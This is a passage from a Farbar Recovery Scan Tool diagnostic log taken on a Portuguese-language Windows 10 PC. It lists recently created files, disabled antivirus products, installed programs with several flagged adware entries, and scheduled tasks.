00000000 ____D C:\ProgramData\12915 2016-01-27 11:06 - 2016-01-27 11:06 - 00000000 ____D C:\Users\Todos os Usuários\31505 2016-01-27 11:06 - 2016-01-27 11:06 - 00000000 ____D C:\Users\Todos os Usuários\17620 2016-01-27 11:06 - 2016-01-27 11:06 - 00000000 ____D C:\ProgramData\31505 2016-01-27 11:06 - 2016-01-27 11:06 - 00000000 ____D C:\ProgramData\17620 2016-01-27 11:05 - 2016-01-27 11:05 - 00000000 ____D C:\Users\Todos os Usuários\24646 2016-01-27 11:05 - 2016-01-27 11:05 - 00000000 ____D C:\ProgramData\24646 2016-01-27 10:59 - 2016-01-27 10:59 - 00000000 ____D C:\Program Files\Realtek 2016-01-27 10:51 - 2016-01-27 10:56 - 148781560 _____ (Lenovo Group Limited ) C:\Users\Maollo\Downloads\h4as09ww.exe 2016-01-23 12:32 - 2016-01-23 12:32 - 00000000 ____D C:\Users\Todos os Usuários\01510 2016-01-23 12:32 - 2016-01-23 12:32 - 00000000 ____D C:\ProgramData\01510 2016-01-23 10:07 - 2016-01-23 10:07 - 00000000 ____D C:\Users\Todos os Usuários\18381 2016-01-23 10:07 - 2016-01-23 10:07 - 00000000 ____D C:\ProgramData\18381 2016-01-22 19:39 - 2016-01-22 19:39 - 00000020 ___SH C:\Users\DefaultAppPool\ntuser.ini 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Modelos 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Meus Documentos 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Menu Iniciar 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Minhas Músicas 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Minhas Imagens 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Meus Vídeos 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Dados de Aplicativos 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Configurações Locais 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu\Programas 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Histórico 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Dados de Aplicativos 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Ambiente de Rede 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Ambiente de Impressão 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 ____D C:\Users\DefaultAppPool 2016-01-22 19:39 - 2016-01-06 14:28 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Roaming\Media Center Programs 2016-01-22 19:36 - 2016-01-22 19:36 - 00000000 ____D C:\Users\Maollo\AppData\Roaming\Awesomium 2016-01-22 19:35 - 2016-01-22 19:35 - 00000000 ____D C:\Users\Maollo\Documents\BnS 2016-01-21 23:05 - 2016-01-27 12:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NCWest 2016-01-21 23:05 - 2016-01-27 12:52 - 00000000 ____D C:\Program Files (x86)\NCWest 2016-01-21 22:50 - 2016-01-21 22:58 - 225000432 _____ (NC Interactive, LLC ) C:\Users\Maollo\Downloads\BnS_Lite_Installer.exe 2016-01-21 17:11 - 2016-01-21 17:11 - 00000000 ____D C:\Users\Maollo\AppData\Local\MicrosoftEdge 2016-01-21 17:08 - 2016-01-21 17:08 - 00042180 _____ C:\Users\Maollo\Desktop\23797668300001503643380250170059859700633330.pdf 2016-01-20 13:04 - 2016-01-20 13:04 - 00000000 ____D C:\Users\Public\Documents\Tools 2016-01-20 12:22 - 2016-02-10 12:22 - 00000314 _____ C:\WINDOWS\Tasks\{2A75E130-E0AE-40d1-B479-E583A0419691}.job 2016-01-20 12:22 - 2016-01-20 12:22 - 00003340 _____ C:\WINDOWS\System32\Tasks\{2A75E130-E0AE-40d1-B479-E583A0419691} 2016-01-20 12:22 - 2016-01-20 12:22 - 00000000 ____D C:\Users\Todos os Usuários\25382 2016-01-20 12:22 - 2016-01-20 12:22 - 00000000 ____D C:\ProgramData\25382 2016-01-20 11:39 - 2016-01-20 11:39 - 00000000 ____D C:\Users\Todos os Usuários\121f8832-4d95-0 2016-01-20 11:39 - 2016-01-20 11:39 - 00000000 ____D C:\ProgramData\121f8832-4d95-0 2016-01-20 11:33 - 2016-01-20 11:33 - 00023248 _____ C:\WINDOWS\System32\Tasks\{0E7F0E47-790E-0908-0F11-0C790E0E110E} 2016-01-20 11:33 - 2016-01-20 11:33 - 00000000 ____D C:\Users\Todos os Usuários\TempMoudleSet 2016-01-20 11:33 - 2016-01-20 11:33 - 00000000 ____D C:\Users\Todos os Usuários\121f8832-3091-1 2016-01-20 11:33 - 2016-01-20 11:33 - 00000000 ____D C:\ProgramData\TempMoudleSet 2016-01-20 11:33 - 2016-01-20 11:33 - 00000000 ____D C:\ProgramData\121f8832-3091-1 2016-01-20 11:32 - 2016-01-23 10:06 - 00000000 ____D C:\Program Files (x86)\updateservice 2016-01-20 11:32 - 2016-01-20 11:32 - 00000000 ____D C:\Users\Todos os Usuários\29918 2016-01-20 11:32 - 2016-01-20 11:32 - 00000000 ____D C:\ProgramData\29918 2016-01-19 15:14 - 2016-01-19 15:14 - 00000000 ____D C:\Users\Todos os Usuários\09450 2016-01-19 15:14 - 2016-01-19 15:14 - 00000000 ____D C:\ProgramData\09450 2016-01-18 21:33 - 2016-01-18 21:33 - 00000000 ____D C:\Users\Todos os Usuários\28321 2016-01-18 21:33 - 2016-01-18 21:33 - 00000000 ____D C:\Users\Todos os Usuários\20187 2016-01-18 21:33 - 2016-01-18 21:33 - 00000000 ____D C:\Users\Todos os Usuários\13390 2016-01-18 21:33 - 2016-01-18 21:33 - 00000000 ____D C:\ProgramData\28321 2016-01-18 21:33 - 2016-01-18 21:33 - 00000000 ____D C:\ProgramData\20187 2016-01-18 21:33 - 2016-01-18 21:33 - 00000000 ____D C:\ProgramData\13390 2016-01-18 21:32 - 2016-01-18 21:33 - 00000000 ____D C:\Users\Todos os Usuários\00781 2016-01-18 21:32 - 2016-01-18 21:33 - 00000000 ____D C:\ProgramData\00781 2016-01-18 21:21 - 2016-01-18 21:21 - 00000000 ____D C:\Users\Todos os Usuários\08831 2016-01-18 21:21 - 2016-01-18 21:21 - 00000000 ____D C:\ProgramData\08831 2016-01-18 20:35 - 2016-01-18 20:35 - 00003712 _____ C:\WINDOWS\System32\Tasks\PFExe 2016-01-18 20:34 - 2016-01-18 21:20 - 00000000 ____D C:\Program Files\WajaNetEn 2016-01-18 20:31 - 2016-02-11 10:24 - 05892175 _____ (MediaDownloader ) C:\Users\Public\Documents\MediaDownloader.exe 2016-01-18 20:29 - 2016-01-18 20:28 - 00060136 _____ (DotC United Inc) C:\WINDOWS\system32\Drivers\MPCKpt.sys 2016-01-18 20:26 - 2016-01-18 20:26 - 00000000 ____D C:\Users\Todos os Usuários\00862 2016-01-18 20:26 - 2016-01-18 20:26 - 00000000 ____D C:\ProgramData\00862 2016-01-17 23:55 - 2016-02-11 10:20 - 00000000 ____D C:\Users\Todos os Usuários\WindowsMsg 2016-01-17 23:55 - 2016-02-11 10:20 - 00000000 ____D C:\ProgramData\WindowsMsg 2016-01-17 23:54 - 2016-01-17 23:55 - 00000000 ____D C:\Users\Todos os Usuários\17491 2016-01-17 23:54 - 2016-01-17 23:55 - 00000000 ____D C:\ProgramData\17491 2016-01-17 23:54 - 2016-01-17 23:54 - 00000000 ____D C:\Users\Todos os Usuários\26378 2016-01-17 23:54 - 2016-01-17 23:54 - 00000000 ____D C:\Users\Todos os Usuários\12493 2016-01-17 23:54 - 2016-01-17 23:54 - 00000000 ____D C:\ProgramData\26378 2016-01-17 23:54 - 2016-01-17 23:54 - 00000000 ____D C:\ProgramData\12493 2016-01-17 23:53 - 2016-01-17 23:54 - 00000000 ____D C:\Users\Todos os Usuários\28992 2016-01-17 23:53 - 2016-01-17 23:54 - 00000000 ____D C:\ProgramData\28992 2016-01-16 21:25 - 2016-01-16 21:25 - 00000000 ____D C:\WINDOWS\system32\SleepStudy 2016-01-16 14:27 - 2016-01-16 14:27 - 00000000 ____D C:\Users\Todos os Usuários\28532 2016-01-16 14:27 - 2016-01-16 14:27 - 00000000 ____D C:\ProgramData\28532 2016-01-16 14:26 - 2016-01-16 14:26 - 00000000 ____D C:\Users\Todos os Usuários\03606 2016-01-16 14:26 - 2016-01-16 14:26 - 00000000 ____D C:\ProgramData\03606 2016-01-16 14:25 - 2016-01-16 14:26 - 00000000 ____D C:\Users\Todos os Usuários\31376 2016-01-16 14:25 - 2016-01-16 14:26 - 00000000 ____D C:\ProgramData\31376 2016-01-16 14:24 - 2016-01-16 14:25 - 00000000 ____D C:\Users\Todos os Usuários\16383 2016-01-16 14:24 - 2016-01-16 14:25 - 00000000 ____D C:\ProgramData\16383 2016-01-16 14:22 - 2016-01-16 14:28 - 00000000 ____D C:\Users\Todos os Usuários\32066 2016-01-16 14:22 - 2016-01-16 14:28 - 00000000 ____D C:\ProgramData\32066 2016-01-16 14:22 - 2016-01-16 14:22 - 00000000 ____D C:\Users\Todos os Usuários\04526 2016-01-16 14:22 - 2016-01-16 14:22 - 00000000 ____D C:\ProgramData\04526 2016-01-16 14:21 - 2016-01-16 16:13 - 00000000 ____D C:\Users\Todos os Usuários\09754 2016-01-16 14:21 - 2016-01-16 16:13 - 00000000 ____D C:\ProgramData\09754 2016-01-16 14:21 - 2016-01-16 14:21 - 00000000 ____D C:\Users\Todos os Usuários\07140 2016-01-16 14:21 - 2016-01-16 14:21 - 00000000 ____D C:\ProgramData\07140 2016-01-16 13:21 - 2016-01-05 00:51 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi 2016-01-16 13:21 - 2016-01-05 00:51 - 01141496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe 2016-01-16 13:21 - 2016-01-05 00:50 - 00671472 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll 2016-01-16 13:21 - 2016-01-05 00:48 - 00499432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll 2016-01-16 13:21 - 2016-01-05 00:45 - 02587696 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll 2016-01-16 13:21 - 2016-01-05 00:42 - 02026736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll 2016-01-16 13:21 - 2016-01-05 00:37 - 02544256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll 2016-01-16 13:21 - 2016-01-05 00:37 - 01299504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll 2016-01-16 13:21 - 2016-01-05 00:37 - 00858952 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll 2016-01-16 13:21 - 2016-01-05 00:37 - 00245840 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll 2016-01-16 13:21 - 2016-01-05 00:37 - 00234504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mftranscode.dll 2016-01-16 13:21 - 2016-01-05 00:36 - 00808800 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe 2016-01-16 13:21 - 2016-01-05 00:33 - 02180128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll 2016-01-16 13:21 - 2016-01-05 00:33 - 01118208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll 2016-01-16 13:21 - 2016-01-05 00:33 - 00701384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll 2016-01-16 13:21 - 2016-01-05 00:33 - 00208176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mftranscode.dll 2016-01-16 13:21 - 2016-01-05 00:33 - 00116728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfps.dll 2016-01-16 13:21 - 2016-01-05 00:31 - 00703840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe 2016-01-16 13:21 - 2016-01-05 00:27 - 01594408 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll 2016-01-16 13:21 - 2016-01-05 00:24 - 00796352 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2016-01-16 13:21 - 2016-01-05 00:23 - 01804664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMALFXGFXDSP.dll 2016-01-16 13:21 - 2016-01-05 00:23 - 01309376 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 2016-01-16 13:21 - 2016-01-05 00:23 - 00786696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMADMOD.DLL 2016-01-16 13:21 - 2016-01-05 00:23 - 00119320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MP3DMOD.DLL 2016-01-16 13:21 - 2016-01-05 00:21 - 01371792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll 2016-01-16 13:21 - 2016-01-05 00:17 - 00695752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMADMOD.DLL 2016-01-16 13:21 - 2016-01-05 00:16 - 00100160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MP3DMOD.DLL 2016-01-16 13:21 - 2016-01-04 23:57 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgrcli.dll 2016-01-16 13:21 - 2016-01-04 23:56 - 00145920 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe 2016-01-16 13:21 - 2016-01-04 23:54 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe 2016-01-16 13:21 - 2016-01-04 23:50 - 00644096 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll 2016-01-16 13:21 - 2016-01-04 23:50 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll 2016-01-16 13:21 - 2016-01-04 23:49 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMSPDMOE.DLL 2016-01-16 13:21 - 2016-01-04 23:49 - 00749056 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneService.dll 2016-01-16 13:21 - 2016-01-04 23:49 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityCommon.dll 2016-01-16 13:21 - 2016-01-04 23:48 - 01009152 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMSPDMOD.DLL 2016-01-16 13:21 - 2016-01-04 23:48 - 00387072 _____ (Microsoft Corporation) C:\WINDOWS\system32\qdvd.dll 2016-01-16 13:21 - 2016-01-04 23:47 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll 2016-01-16 13:21 - 2016-01-04 23:47 - 00479232 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll 2016-01-16 13:21 - 2016-01-04 23:45 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\qedit.dll 2016-01-16 13:21 - 2016-01-04 23:45 - 00275968 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll 2016-01-16 13:21 - 2016-01-04 23:43 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll 2016-01-16 13:21 - 2016-01-04 23:43 - 00584704 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2016-01-16 13:21 - 2016-01-04 23:41 - 00558592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll 2016-01-16 13:21 - 2016-01-04 23:40 - 00890880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMSPDMOD.DLL 2016-01-16 13:21 - 2016-01-04 23:39 - 03428864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll 2016-01-16 13:21 - 2016-01-04 23:39 - 00569856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qdvd.dll 2016-01-16 13:21 - 2016-01-04 23:39 - 00498176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll 2016-01-16 13:21 - 2016-01-04 23:38 - 00389120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll 2016-01-16 13:21 - 2016-01-04 23:36 - 00573440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qedit.dll 2016-01-16 13:21 - 2016-01-04 23:30 - 02796032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll 2016-01-16 13:20 - 2016-01-04 23:57 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMSRoamingSecurity.dll 2016-01-16 13:20 - 2016-01-04 23:53 - 00148992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshom.ocx 2016-01-16 13:20 - 2016-01-04 23:52 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll 2016-01-16 13:20 - 2016-01-04

Format du document : text/plain

Prévisualisation

Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão:07-02-2016
Executado por Maollo (2016-02-11 11:31:08)
Executando a partir de C:\Users\Maollo\Downloads
Windows 10 Pro (X64) (2016-01-06 16:42:47)
Modo da Inicialização: Normal
==========================================================

==================== Contas: =============================

Administrador (S-1-5-21-2840682155-2406404488-1448223199-500 - Administrator - Disabled)
Convidado (S-1-5-21-2840682155-2406404488-1448223199-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-2840682155-2406404488-1448223199-503 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2840682155-2406404488-1448223199-1002 - Limited - Enabled)
Maollo (S-1-5-21-2840682155-2406404488-1448223199-1001 - Administrator - Enabled) => C:\Users\Maollo

==================== Central de Segurança ========================

(Se uma entrada for incluída na fixlist, será removida.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: 360 Total Security (Disabled - Up to date) {2B66EE1E-E5C8-C2F7-648F-4E55AC68D37D}
AS: 360 Total Security (Disabled - Up to date) {90070FFA-C3F2-CD79-5E3F-7527D7EF99C0}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programas Instalados ======================

(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)

µTorrent (HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)
360 Total Security (HKLM-x32\...\360TotalSecurity) (Version: 8.0.0.1072 - 360 Security Center)
Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated)
Advanced Calendar 2.0.0.11189 (HKLM\...\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}) (Version: 2.0.0.11189 - MEIXIAN XIE) <==== ATENÇÃO
Atualizações da NVIDIA 2.5.14.5 (Version: 2.5.14.5 - NVIDIA Corporation) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Blade & Soul (HKLM-x32\...\InstallShield_{C3F383C1-D050-4A40-843F-8171A6A02C3A}) (Version: 1.0.63.237 - NC Interactive, LLC)
Blade & Soul (x32 Version: 1.0.63.237 - NC Interactive, LLC) Hidden
BlueStacks App Player (HKLM-x32\...\{D7E3588F-25E6-4A93-8B1C-596F7951CA38}) (Version: 0.10.7.5601 - BlueStack Systems, Inc.)
Combat Arms (HKLM-x32\...\Combat Arms) (Version: - )
Diablo III (HKLM-x32\...\Diablo III) (Version: - Blizzard Entertainment)
Diablo III Public Test (HKLM-x32\...\Diablo III Public Test) (Version: - Blizzard Entertainment)
Gameo (HKU\.DEFAULT\...\Gameo) (Version: 0.14.1 - IronSource Ltd.) <==== ATENÇÃO
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
HP Deskjet 2050 J510 series Ajuda (HKLM-x32\...\{7A3DF2E2-CF13-44FB-A93E-F71D5381DB3F}) (Version: 140.0.61.61 - Hewlett Packard)
HP Deskjet 2050 J510 series Estudo de aprimoramento de produtos (HKLM\...\{8D71EFB0-B1EF-4478-92D2-A65DB23AC460}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Deskjet 2050 J510 series Software básico do dispositivo (HKLM\...\{2DCBB45E-AA03-4089-87E7-EC17E606D738}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Support Solutions Framework (HKLM-x32\...\{CAF5FFBA-8F3B-409C-9126-74DF66A036DF}) (Version: 12.0.30.81 - Hewlett-Packard Company)
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
Intel Android Device USB driver (HKLM\...\Intel Android Device USB driver) (Version: 1.1.5 - Intel)
Java 8 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218071F0}) (Version: 8.0.710.15 - Oracle Corporation)
Jogos Level Up (HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\...\6d7bdf9c3c2a31f9) (Version: 0.9.4.29 - Level Up)
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games)
League of Legends (x32 Version: 3.0.1 - Riot Games) Hidden
Lightshot-5.3.0.0 (HKLM-x32\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.3.0.0 - Skillbrains)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
NCSOFT Game Launcher (HKLM-x32\...\NCLauncher_NCWest) (Version: - NCSOFT)
NVIDIA Driver de controle do 3D Vision 340.50 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 340.50 - NVIDIA Corporation)
NVIDIA Driver de gráficos 341.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.81 - NVIDIA Corporation)
NVIDIA Driver do 3D Vision 341.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 341.81 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.5.14.5 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.5.14.5 - NVIDIA Corporation)
NVIDIA Software do sistema PhysX 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
osu! (HKLM-x32\...\{054ad7f6-7bcc-4e1c-aabe-bc4257b7f2a8}) (Version: latest - ppy Pty Ltd)
Overwolf (HKLM-x32\...\Overwolf) (Version: 0.92.3.0 - Overwolf Ltd.)
Overwolf.Setup.VC100CRTx64.Dist (HKLM\...\{EC9D5554-6852-4A55-81BB-AC02C7A8CFED}) (Version: 1.0.0 - Overwolf)
Overwolf.Setup.VC100CRTx86.Dist (x32 Version: 1.0.0 - Overwolf) Hidden
Painel de controle da NVIDIA 341.92 (Version: 341.92 - NVIDIA Corporation) Hidden
Platform (x32 Version: 1.34 - VIA Technologies, Inc.) Hidden
PriceFountain (remove only) (HKU\.DEFAULT\...\PriceFountain) (Version: 1.2.8.0 - JMLVPNWAROPHE) <==== ATENÇÃO
Primary Color (HKLM\...\Primary Color) (Version: 2016.02.05.191508 - Primary Color) <==== ATENÇÃO
Professional Cleaning Software (HKLM-x32\...\Professional Cleaning Software) (Version: 3.0.7 - Professional Cleaning Software)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.61.612.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6909 - Realtek Semiconductor Corp.)
Revo Uninstaller Pro 3.1.5 (HKLM\...\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 3.1.5 - VS Revo Group, Ltd.)
RinoReader (HKLM-x32\...\RinoReader) (Version: 0.1 - RinoReader) <==== ATENÇÃO
Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATENÇÃO
SHIELD Streaming (Version: 4.1.3000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.5.14.5 - NVIDIA Corporation) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
Skype™ 7.18 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.18.109 - Skype Technologies S.A.)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
Update for PriceFountain (HKU\.DEFAULT\...\Price Fountain) (Version: - Update for PriceFountain) <==== ATENÇÃO
VIA Gerenciador de dispositivo de plataforma (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.34 - VIA Technologies, Inc.)
WarThunder (HKU\.DEFAULT\...\WarThunder) (Version: - WarThunder) <==== ATENÇÃO
WinRAR 5.21 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)

==================== Exame Personalizado CLSID (Whitelisted): ==========================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

CustomCLSID: HKU\S-1-5-21-2840682155-2406404488-1448223199-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Maollo\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\FileCoAuth.exe (Microsoft Corporation)

==================== Tarefas Agendadas (Whitelisted) =============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

Task: {04ED6BE3-5DB4-4804-B37B-D63DB90CEFC0} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-10-20] (Adobe Systems Incorporated)
Task: {0D77B420-CBA4-49BB-B38A-C4B8F636E03F} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {1937248A-0B5C-49E4-84BA-8898388647DD} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {2BF1ECE6-31DD-4F1E-B9CD-06058E8C0250} - System32\Tasks\{A9A02F16-AF76-40C9-A1E9-A93FD502B229} => pcalua.exe -a "C:\Program Files (x86)\MPC Cleaner\Uninstall.exe" -d "C:\Program Files (x86)\MPC Cleaner"
Task: {32EAEC5F-0B72-4FE6-8A43-D7F4F03372F3} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2014-11-28] ()
Task: {3481650B-E414-44F1-B51D-989A194B8AC7} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {36CBCE00-E4DC-48FF-8F62-FC4122F74571} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {394E9DA8-D907-4BA9-847A-50738F100223} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {3994915F-A6BA-4FFE-B71E-0B0A78A88757} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {3B83B638-0528-47DA-940C-C775CBA06E33} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {3BAD3942-517B-4378-BA98-B4359B1D34A1} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {3C213F73-125C-43F9-A3CE-5C3A71035568} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {4699AA4D-5C8F-432F-9B25-B5710891A136} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {49B16C2C-361F-4C20-990F-18421019866A} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
